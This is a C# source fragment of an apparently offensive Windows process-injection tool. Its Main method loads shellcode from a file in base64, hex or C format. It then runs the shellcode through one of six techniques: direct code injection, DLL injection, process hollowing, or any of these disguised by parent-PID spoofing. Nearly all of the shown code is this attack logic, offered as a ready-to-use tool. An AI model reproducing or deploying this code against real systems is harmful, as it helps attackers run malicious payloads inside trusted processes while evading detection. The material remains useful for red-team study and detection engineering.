public static void PPIDDLLInject(string binary, byte[] shellcode, int parentpid)
{
ParentPidSpoofing Parent = new ParentPidSpoofing();
PROCESS_INFORMATION pinf = Parent.ParentSpoofing(parentpid, binary);
DLLInject(pinf.dwProcessId, shellcode);
}
static void Main(string[] args)
{
try
{
logo();
// https://github.com/GhostPack/Rubeus/blob/master/Rubeus/Domain/ArgumentParser.cs#L10
var arguments = new Dictionary <string, string>();
foreach (var argument in args)
{
var idx = argument.IndexOf(':');
if (idx > 0)
{
arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
}
else
{
arguments[argument] = string.Empty;
}
}
WindowsIdentity identity = WindowsIdentity.GetCurrent();
WindowsPrincipal principal = new WindowsPrincipal(identity);
if (principal.IsInRole(WindowsBuiltInRole.Administrator))
{
Console.WriteLine($"[+] Process running with {principal.Identity.Name} privileges with HIGH integrity.");
}
else
{
Console.WriteLine($"[+] Process running with {principal.Identity.Name} privileges with MEDIUM / LOW integrity.");
}
if (arguments.Count == 0)
{
Console.WriteLine("[+] No arguments specified. Please refer the help section for more details.");
help();
}
else if (arguments.Count < 3)
{
Console.WriteLine("[+] Some arguments are missing. Please refer the help section for more details.");
help();
}
else if (arguments.Count >= 3)
{
int procid = 0;
if (arguments.ContainsKey("/pid"))
{
procid = Convert.ToInt32(arguments["/pid"]);
Process process = Process.GetProcessById(procid);
}
if (System.IO.File.Exists(arguments["/path"]))
{
if (arguments["/t"] == "1")
{
var shellcode = System.IO.File.ReadAllText(arguments["/path"]);
byte[] buf = new byte[] { };
if (arguments["/f"] == "base64")
{
buf = Convert.FromBase64String(shellcode);
}
else if (arguments["/f"] == "hex")
{
buf = StringToByteArray(shellcode);
}
else if (arguments["/f"] == "c")
{
buf = convertfromc(shellcode);
}
CodeInject(procid, buf);
}
else if (arguments["/t"] == "2")
{
var dllpath = arguments["/path"];
byte[] buf = Encoding.Default.GetBytes(dllpath);
DLLInject(procid, buf);
}
else if (arguments["/t"] == "3")
{
var shellcode = System.IO.File.ReadAllText(arguments["/path"]);
byte[] buf = new byte[] { };
if (arguments["/f"] == "base64")
{
buf = Convert.FromBase64String(shellcode);
}
else if (arguments["/f"] == "hex")
{
buf = StringToByteArray(shellcode);
}
else if (arguments["/f"] == "c")
{
buf = convertfromc(shellcode);
}
ProcHollowing prochollow = new ProcHollowing();
prochollow.Hollow(arguments["/ppath"], buf);
}
else if (arguments["/t"] == "4")
{
Console.WriteLine($"[+] Parent Process Spoofing with Vanila Process Injection Technique.");
ParentPidSpoofing Parent = new ParentPidSpoofing();
string ppid = null;
int parentProc = 0;
ppid = Convert.ToString(arguments["/parentproc"]);
parentProc = Parent.SearchForPPID(ppid);
var shellcode = System.IO.File.ReadAllText(arguments["/path"]);
byte[] buf = new byte[] { };
if (arguments["/f"] == "base64")
{
buf = Convert.FromBase64String(shellcode);
}
else if (arguments["/f"] == "hex")
{
buf = StringToByteArray(shellcode);
}
else if (arguments["/f"] == "c")
{
buf = convertfromc(shellcode);
}
PPIDCodeInject(arguments["/ppath"], buf, parentProc);
}
else if (arguments["/t"] == "5")
{
Console.WriteLine($"[+] Parent Process Spoofing with DLL Process Injection Technique.");
ParentPidSpoofing Parent = new ParentPidSpoofing();
string ppid = null;
int parentProc = 0;
ppid = Convert.ToString(arguments["/parentproc"]);
parentProc = Parent.SearchForPPID(ppid);
var dllpath = arguments["/path"];
byte[] buf = Encoding.Default.GetBytes(dllpath);
PPIDDLLInject(arguments["/ppath"], buf, parentProc);
}
else if (arguments["/t"] == "6")
{
Console.WriteLine($"[+] Parent Process Spoofing with Process Hollowing Injection Technique.");
ParentPidSpoofing Parent = new ParentPidSpoofing();
string ppid = null;
int parentProc = 0;
ppid = Convert.ToString(arguments["/parentproc"]);
parentProc = Parent.SearchForPPID(ppid);
var shellcode = System.IO.File.ReadAllText(arguments["/path"]);
byte[] buf = new byte[] { };
if (arguments["/f"] == "base64")
{
buf = Convert.FromBase64String(shellcode);
}
else if (arguments["/f"] == "hex")
{
buf = StringToByteArray(shellcode);
}
else if (arguments["/f"] == "c")
{
buf = convertfromc(shellcode);
}
Parent.PPidSpoof(arguments["/ppath"], buf, parentProc);
}
}
else
{
Console.WriteLine("[+] File doesn't exists. Please check the specified file path.");
}
}
else
{
Console.WriteLine("[+] Invalid argument. Please refer the help section for more details.");
help();
}
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
}
